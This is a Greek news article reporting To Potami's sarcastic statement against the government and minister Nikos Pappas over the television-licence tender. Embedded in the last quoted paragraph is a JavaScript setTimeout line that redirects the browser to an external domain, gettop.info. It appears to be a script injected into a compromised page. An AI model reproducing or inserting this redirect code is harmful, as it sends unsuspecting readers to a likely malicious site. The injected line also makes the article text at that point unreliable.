«Βέλη» από το Ποτάμι στον Ν. Παππά για τις άδειες

0
33

 

Με ανακοίνωσή του το Ποτάμι εξαπέλυσε επίθεση στην κυβέρνηση και τον υπουργό Επικρατείας για τις εξελίξεις στον διαγωνισμό με τις τηλεοπτικές άδειες.

Στη γραμμή που έδωσε ο επικεφαλής του Σταύρος Θεοδωράκης μέσω twitter νωρίτερα, το Ποτάμι υποστηρίζει πως «το εγχείρημα ΣΥΡΙΖΑ TV κλυδωνίζεται αλλά αυτός δεν είναι λόγος να τα βάψουν μαύρα στο Μαξίμου. Ίσως μάλιστα να είναι η ευκαιρία για την έφοδο στον ουρανό. Όπως απέδειξε η πρόβα με τον κ. Καλογρίτσα, βοσκοτόπια υπάρχουν, εγγυητικές επιστολές υπογράφονται, δάνεια δίνονται, εργολαβίες εξασφαλίζονται».

Το Ποτάμι εξαπολύει βέλη και στον υπουργό Επικρατείας, Νίκο Παπά, αναφέροντας:«Αυτό που είναι σπάνιο και αυτό που χρειάζεται τούτη την ώρα είναι ένα πρόσωπο με στόφα καναλάρχη. Και ουδείς καταλληλότερος από τον κ. Παππά. Να βγει λοιπόν μπροστά ο ίδιος. Να μην χάνουμε χρόνο και σπαταλάμε δυνάμεις. Θέλουν και οι ξένοι να μας πάρουν το νερό… Ας το σκεφθεί ο κ.Τσίπρας. Κι αν τελικά ο κ. Παππάς προτιμά το παρασκήνιο, υπάρχει η λύση του κ. Λεβέντη. Έχει αδιαμφισβήτητη πείρα στις καταλήψεις συχνοτήτων και στις πωλήσεις καναλιών, εκεί έχει φάει όλα τα ωραία χρόνια του». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here